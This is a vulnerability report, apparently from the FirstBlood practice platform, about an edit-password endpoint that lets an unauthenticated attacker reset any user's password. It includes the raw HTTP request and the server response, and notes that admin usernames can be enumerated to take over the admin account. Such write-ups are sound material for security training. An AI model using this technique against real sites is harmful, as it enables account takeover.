FirstBlood-#383Edit password functionality can be used to reset password of any user
This issue was discovered on FirstBlood v2.0.0 (issues patched)

On 2021-10-25, sumyth Level 2 reported:


Please find a brief description of the vulnerability below,

In there exists a functionality which can be used to reset the password of any user/doctor present on the website without even being authenticated.

Steps to reproduce:

  1. Generate the following post request with username of your choice,
POST /drpanel/drapi/editpassword.php HTTP/1.1
Sec-Ch-Ua: ";Not A Brand";v="99", "Chromium";v="94"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

  1. Send the request to server. Observe that the server responds with a new set of password for the user even without performing proper authorization checks,
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Oct 2021 15:58:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 34

Password updated - bL9TfVhgA5Oxs46


Having a password changing functionality without any kind of authorization can lead to an attacker reset the password for any user on the website which will lead to account compromise.


Endpoint: /drpanel/drapi/editpassword.php This bug makes use of the following vulnerabilities in a chain:

  • Auth issues
  • Auth issues

FirstBlood ID: 28
Vulnerability Type: Auth issues

The endpoint /drapi/editpassword can actually be accessed unauthenticated.

FirstBlood ID: 27
Vulnerability Type: Application/Business Logic

It is possible to edit the admins password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.